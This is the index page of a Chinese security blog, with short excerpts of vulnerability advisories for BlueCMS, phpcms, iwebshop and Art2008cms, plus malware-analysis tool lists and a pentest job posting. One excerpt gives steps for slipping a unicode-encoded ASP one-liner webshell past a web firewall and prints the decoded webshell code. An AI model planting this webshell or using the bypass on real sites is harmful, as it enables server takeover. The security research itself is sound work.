黑面小窝

欢迎光临小窝,有任何问题请留言反馈。QQ:3768110 本站使用全屏模板,导致你访问框架变形的敬请谅解~

[置顶] 友情链接交换说明

[置顶] ★★★本站网络服务项目★★★

病毒分析在线沙盘 & 恶意行为分析工具SysAnalyzer

病毒分析在线沙盘:
1. Anubis- Analyzing Unknown Binaries
http://analysis.seclab.tuwien.ac.at/index.php

More...

BlueCMS getip()注射漏洞

发布作者:cnryan   

官方地址:www.bluecms.net    漏洞类型:SQL注入

一、描述
BlueCMS是一个地方分类信息门户专用CMS系统。
程序在使用getip()函数获取客户端ip时没有严格过滤数据,导致sql注射漏洞。

二、分析
//comment.php

More...

phpcms 2008 sp4 爆路径及任意文件删除漏洞

发布作者:CnCxzSec(衰仔)   

影响版本:phpcms 2008 sp4   

官方地址:www.phpcms.cn   

漏洞类型:爆路径及任意文件删除

漏洞描述:某页面下,未作容错处理导致爆路径,同时过滤不严导致恶意攻击者可以删除网站任意文件

详细说明:corpandresize/config.inc.php中定义:

More...

网络渗透技术安全检测技术人员招聘要求总结

1,熟悉SQL注入,跨站脚本攻击,XSS钓鱼,上传漏洞,远程文件包含漏洞,本地文件包含漏洞,变量未初始化漏洞,PHP执

行任意命令漏洞,熟悉各种数据库(mssql、mysql、Oracle等)以及常见的web安全漏洞及漏洞利用;

2,熟悉掌握基于*nix+PHP等不同平台的Web安全检测技巧,并熟悉Shell提权手段;

3,熟悉Windows提权漏洞,Linux提权漏洞,SNIFFER嗅探,缓冲区溢出等各个网络攻防方面的内容;

More...

计算机强悍安全辅助工具PowerTool绿色版2.6


目前版本主要功能:
...

More...

恶意文档分析工具

转自:Cmdhz‘blog

1、Offvis

Offvis - 显示微软office文件的原始内容和结构, 并能鉴别一些常见的exploit。

微软MSRC小组开发的可视化扫描工具,结合OLESS格式和office文档格式做了详细分析,

可以清楚地看清Office文档的结构,并能识别一些常见的漏洞文档。

More...

通过unicode躲开web防火墙过滤,webshell上传全是空格问题

现在有不少服务器加了web的防火墙,用来过滤含asp/jsp/php的网马代码,全部用空格替换,

比较讨厌,不过后来刚好想到以前的一句话时候的unicode编码,那就也搞一个吧。

1.新建一个mdb

2.建表,考入:┼攠數畣整爠煥敵瑳∨≡┩> nbsp;

(实际是<% execute request(“a”)%>)

3.改后缀为asp/asa

...

More...

iwebshop0.7.7 0day

author:Luc1f3r
blog:http://hi.baidu.com/luc1f3r_


漏洞出在根目录的auction_list.php,第77行-86行:

/* 浏览记录 */
$getcookie = get_hisgoods_cookie();
...

More...

Art2008cms 4.3 的鸡肋漏洞--列目录

FORM WWW.ST999.CN/BLOG

对于前个3.1版本的cookies欺骗漏洞,http://www.st999.cn/blog/?action=show&id=315,本来错误的以为4.1的换成了seesion验证了,结果再次发现,竟然还是cookies验证,只不过是加了个referer验证而已。所以,这个后台欺骗漏洞我也没利用成功,,哪位朋友如果有办法利用的,麻烦到我的blog给我留言下,blog http://www.st999.cn/blog!!!

More...

10大最热门的网站开发技术

当今网站开发领域很繁荣,因为不论是现在或者将来,网络必定是人们日常生活中不可缺少的组成部分。NETTUTS上列出10大最吃香的网站开发技术。

1. Framework knowledge (架构知识)

     架构是大型网站开发的重要部分。开发者已经从Rails, Django等公司提供的网站架构工具中收益,因为架构工具可以帮助完成那些需要一定编程知识的重复性的任务。如果你拥有领先的架构技术(像Rails, Django, CakePHP, Symfony等),你的择业面将非常广阔。

More...

分页:« 首页...«1[2][3][4][5][6][7][8][9][10]»...尾页 »